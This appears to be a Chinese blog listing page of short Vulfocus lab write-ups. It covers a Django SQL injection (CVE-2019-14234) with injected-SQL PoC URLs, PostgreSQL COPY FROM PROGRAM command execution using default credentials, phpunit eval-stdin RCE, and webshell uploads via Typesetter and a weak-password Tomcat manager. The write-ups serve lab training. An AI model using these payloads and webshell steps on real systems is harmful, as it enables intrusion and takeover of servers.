靶场
过往年少
这个作者很懒,什么都没留下…
展开
-
vulfocus Django SQL注入漏洞(CVE-2019-14234)
打开网址 访问/admin 后台登陆后访问/admin/vuln/collection/poc:http://your-ip:8000/admin/vuln/collection/?detail__a%27b=123http://ip:8000/admin/vuln/collection/?detail__title')%3d'1' or 1%3d1 %3bcreate table cmd_exec(cmd_output text)--%20得到flag...原创 2021-08-25 10:08:13 · 838 阅读 · 0 评论 -
vuflocus postgresql 命令执行 (cve-2019-9193)
连接数据库psql --host ip -p port --username账号:postgres密码:postgres输入命令:DROP TABLE IF EXISTS cmd_exec #执行删除你想用来保存命令输出但是可能存在的表 CREATE TABLE cmd_exec(cmd_output text) #创建保存输出的表COPY cmd_exec FROM PROGRAM ls /tmp' #执行系统命令SELECT * FROM cmd_exec原创 2021-08-24 17:33:48 · 258 阅读 · 0 评论 -
vulfocus:typesetter 文件上传
管理员账号密码登入点击已上传的档案上传木马文件(zip文件)解压点击2.php得到路径 蚁剑连接得到flag原创 2021-08-24 10:42:07 · 207 阅读 · 0 评论 -
Vulfocus phpunit远程代码执行
phpunit 远程代码执行 (CVE-2017-9841)打开靶场访问存在漏洞的urlIp/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php抓包改包 提交为POST数据 并添加执行phpinfo的代码执行可得到flag原创 2021-08-18 09:34:10 · 427 阅读 · 0 评论 -
vulfcous学习-tomcat-pass-getshell 弱口令
vulfcous学习-tomcat-pass-getshell 弱口令打开靶机地址 尝试登陆 manager APP后台 tomcat/tomcat制作war包 将jsp大马压缩为zip再更改后缀为war访问 靶机url/压缩文件名/大马文件名.jsp输入密码进入文件系统输入/tmp得到flag...原创 2021-07-20 10:32:50 · 347 阅读 · 1 评论